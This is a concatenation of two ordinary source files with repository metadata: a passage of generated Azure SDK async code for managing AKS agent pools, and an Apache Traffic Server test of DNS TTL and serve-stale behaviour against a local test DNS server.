else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools"} # type: ignore
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPool:
"""Gets the specified managed cluster agent pool.
Gets the specified managed cluster agent pool.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPool
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPool]
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> _models.AgentPool:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPool]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "AgentPool")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("AgentPool", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: _models.AgentPool,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPool
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
        :param parameters: The agent pool to create or update. Is either a model type or an IO type.
Required.
:type parameters: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPool or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPool]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs)) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
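    # Illustrative only: begin_create_or_update returns an AsyncLROPoller, so a caller
    # typically awaits poller.result() to block until provisioning finishes. The pool
    # sizing values below are assumptions.
    #
    #   parameters = AgentPool(count=3, vm_size="Standard_DS2_v2", mode="System")
    #   poller = await client.agent_pools.begin_create_or_update(
    #       "my-rg", "my-cluster", "nodepool1", parameters)
    #   agent_pool = await poller.result()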
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[None]
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool in the specified managed cluster.
Deletes an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[None]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs)) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPoolUpgradeProfile:
"""Gets the upgrade profile for an agent pool.
Gets the upgrade profile for an agent pool.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPoolUpgradeProfile
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPoolUpgradeProfile]
request = build_get_upgrade_profile_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_upgrade_profile.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolUpgradeProfile", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default"} # type: ignore
@distributed_trace_async
async def get_available_agent_pool_versions(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> _models.AgentPoolAvailableVersions:
"""Gets a list of supported Kubernetes versions for the specified agent pool.
See `supported Kubernetes versions
<https://docs.microsoft.com/azure/aks/supported-kubernetes-versions>`_ for more details about
the version lifecycle.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2021_05_01.models.AgentPoolAvailableVersions
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.AgentPoolAvailableVersions]
request = build_get_available_agent_pool_versions_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_available_agent_pool_versions.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolAvailableVersions", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions"} # type: ignore
async def _upgrade_node_image_version_initial(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> Optional[_models.AgentPool]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[_models.AgentPool]]
request = build_upgrade_node_image_version_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._upgrade_node_image_version_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 202:
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_upgrade_node_image_version_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"} # type: ignore
@distributed_trace_async
async def begin_upgrade_node_image_version(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Upgrades the node image version of an agent pool to the latest.
Upgrading the node image version of an agent pool applies the newest OS and runtime updates to
the nodes. AKS provides one new image per week with the latest updates. For more details on
node image versions, see: https://docs.microsoft.com/azure/aks/node-image-upgrade.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[None]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._upgrade_node_image_version_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs)) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_upgrade_node_image_version.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"} # type: ignore
| {
"content_hash": "0826012ed8f82e63c26634f1c9171458",
"timestamp": "",
"source": "github",
"line_count": 819,
"max_line_length": 263,
"avg_line_length": 47.7997557997558,
"alnum_prop": 0.6479513640543578,
"repo_name": "Azure/azure-sdk-for-python",
"id": "97f61edd1806ef8efda0bfe7ffb806d300689e96",
"size": "39648",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2021_05_01/aio/operations/_agent_pools_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
'''
Test DNS TTL behavior.
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ports
Test.Summary = 'Test DNS TTL behavior'
class TtlDnsTest:
single_transaction_replay = "replay/single_transaction.replay.yaml"
server_error_replay = "replay/server_error.replay.yaml"
process_counter = 1
# The TTL to set for every resolved hostname.
dnsTTL = 1
# The DNS query timeout.
queryTimeout = 1
def __init__(self, configure_serve_stale=False, exceed_serve_stale=False):
"""
Args:
configure_serve_stale: (bool) Whether the ATS process should be configured to
serve stale DNS entries.
exceed_serve_stale: (bool) Configure the serve_stale timeout to be low
enough that the timed out DNS response will not be used.
"""
self.configure_serve_stale = configure_serve_stale
self.exceed_serve_stale = exceed_serve_stale
        # get_unique_process_counter() already bumps the class-level counter
        self.server_process_counter = TtlDnsTest.get_unique_process_counter()
self.setupOriginServer()
self.setupTS()
@classmethod
def get_unique_process_counter(cls):
this_counter = cls.process_counter
cls.process_counter += 1
return this_counter
def addDNSServerToTestRun(self, test_run):
dns = test_run.MakeDNServer("dns", port=self.dns_port)
dns.addRecords(records={'resolve.this.com': ['127.0.0.1']})
return dns
def setupOriginServer(self):
self.server = Test.MakeVerifierServerProcess(
f"server-{self.server_process_counter}", TtlDnsTest.single_transaction_replay)
def setupTS(self):
self.ts = Test.MakeATSProcess(
f"ts-{self.server_process_counter}", enable_cache=False)
self.dns_port = ports.get_port(self.ts, 'dns_port')
self.ts.Disk.records_config.update({
"proxy.config.diags.debug.enabled": 1,
"proxy.config.diags.debug.tags": "dns",
'proxy.config.dns.nameservers': f'127.0.0.1:{self.dns_port}',
'proxy.config.dns.resolv_conf': 'NULL',
# Configure ATS to treat each resolved name to have a 1 second
# time to live.
"proxy.config.hostdb.ttl_mode": 1,
"proxy.config.hostdb.timeout": self.dnsTTL,
# MicroDNS will be down for the second transaction. Have ATS give
# up trying to talk to it after one second.
"proxy.config.hostdb.lookup_timeout": self.queryTimeout,
})
if self.configure_serve_stale:
if self.exceed_serve_stale:
stale_timeout = 1
else:
stale_timeout = 300
self.ts.Disk.records_config.update({
"proxy.config.hostdb.serve_stale_for": stale_timeout
})
self.ts.Disk.remap_config.AddLine(
f"map / http://resolve.this.com:{self.server.Variables.http_port}/")
def testRunWithDNS(self):
tr = Test.AddTestRun()
# Run the DNS server with this test run so it will not be running in
# the next one.
dns = self.addDNSServerToTestRun(tr)
process_number = TtlDnsTest.get_unique_process_counter()
tr.AddVerifierClientProcess(
f"client-{process_number}",
TtlDnsTest.single_transaction_replay,
http_ports=[self.ts.Variables.port])
tr.Processes.Default.StartBefore(dns)
tr.Processes.Default.StartBefore(self.server)
tr.Processes.Default.StartBefore(self.ts)
tr.StillRunningAfter = dns
tr.StillRunningAfter = self.server
tr.StillRunningAfter = self.ts
def testRunWithoutDNS(self):
tr = Test.AddTestRun()
# Delay running the second transaction for long enough to guarantee
# that both the TTL and the DNS query timeout (lookup_timeout) are
# exceeded.
tr.DelayStart = 3
# Will the stale resolved DNS response be used?
if self.configure_serve_stale and not self.exceed_serve_stale:
# Yes: expect a proxied transaction with a 200 OK response.
replay_file = TtlDnsTest.single_transaction_replay
else:
# No: expect a 5xx response because the server name could not be
# resolved.
replay_file = TtlDnsTest.server_error_replay
process_number = TtlDnsTest.get_unique_process_counter()
tr.AddVerifierClientProcess(
f"client-{process_number}",
replay_file, http_ports=[self.ts.Variables.port])
tr.StillRunningAfter = self.server
tr.StillRunningAfter = self.ts
def run(self):
self.testRunWithDNS()
self.testRunWithoutDNS()
TtlDnsTest().run()
TtlDnsTest(configure_serve_stale=True, exceed_serve_stale=False).run()
TtlDnsTest(configure_serve_stale=True, exceed_serve_stale=True).run()
| {
"content_hash": "47698fcad6264daca9da16842b555527",
"timestamp": "",
"source": "github",
"line_count": 152,
"max_line_length": 90,
"avg_line_length": 37.26315789473684,
"alnum_prop": 0.6486581920903954,
"repo_name": "SolidWallOfCode/trafficserver",
"id": "cd0d7ff6299667471d57e317c20a7dda6e836470",
"size": "5664",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/gold_tests/dns/dns_ttl.test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1437789"
},
{
"name": "C++",
"bytes": "17168056"
},
{
"name": "CMake",
"bytes": "13151"
},
{
"name": "Dockerfile",
"bytes": "6693"
},
{
"name": "Java",
"bytes": "9881"
},
{
"name": "Lua",
"bytes": "64412"
},
{
"name": "M4",
"bytes": "222699"
},
{
"name": "Makefile",
"bytes": "255714"
},
{
"name": "Objective-C",
"bytes": "13042"
},
{
"name": "Perl",
"bytes": "128436"
},
{
"name": "Python",
"bytes": "1569159"
},
{
"name": "Rust",
"bytes": "2591"
},
{
"name": "SWIG",
"bytes": "25777"
},
{
"name": "Shell",
"bytes": "178570"
},
{
